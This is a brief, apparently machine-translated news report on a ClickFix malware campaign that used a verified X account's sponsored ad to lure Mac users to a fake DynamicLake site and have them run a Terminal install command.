Cybercriminals used social network X to spread ‘malware’ through their sponsored ads

A X verified account was used unknowingly to distribute ‘malware’ targeting Mac users through a fraudulent ad that impersonated the DynamicLake application, as part of a social engineering campaign by ‘ClickFix’, managing to bypass the platform controls.

Cybercriminals They used a ‘ClickFix’ type attackalready perpetrated on previous occasions even against macOS devices, which is based on deceiving users, in this case, promoting an alleged version of DynamicLake, an application for Mac that simulates the ‘Dynamic Island’ of the iPhone on the screen.

This was shared by Jamf Threat Labs security researchers in a publication on their X account, where they detailed that the ‘malware’ campaign was launched from a legitimate verified account with numerous followers, which allowed the sending of ‘malware’ to thousands of X users.

As explained, the strategy consisted of redirect users to domain ‘dynamicmacisland.com’very similar to that of the original ‘app’ for Mac, where it was indicated to open the Terminal to execute an installation command, when in reality the objective was to introduce a malicious agent into the victim’s computer. This is the classic technique that defines the behavior of social engineering attacks known as ‘ClickFix’.

This is not the first time that malicious actors have used this type of ‘apps’ related to Dynamic Island functionality as decoys in malware campaigns for macOS, as the security firm refers in its publication on

The problem with this attack is because it comes from a verified account, whose name has not been shared to maintain the anonymity of the owner because its intention was at no time to spread malware in the paid ads made. From the looks of it, the owner trusted the advertisement and approved it for his account, believing at all times that it was totally legitimate, without knowing that there was a malicious domain behind it.

Cybercriminals were able to circumvent the X system that is responsible for automatically scanning ads with a link to a domain very similar to the real one.

It is not the first time this has happened in the advertising industry, according to the digital media 9to5Mac, and Google Ads had to face a similar problem when approving fake ads from the Homebrew tool to infect Mac users.

By Editor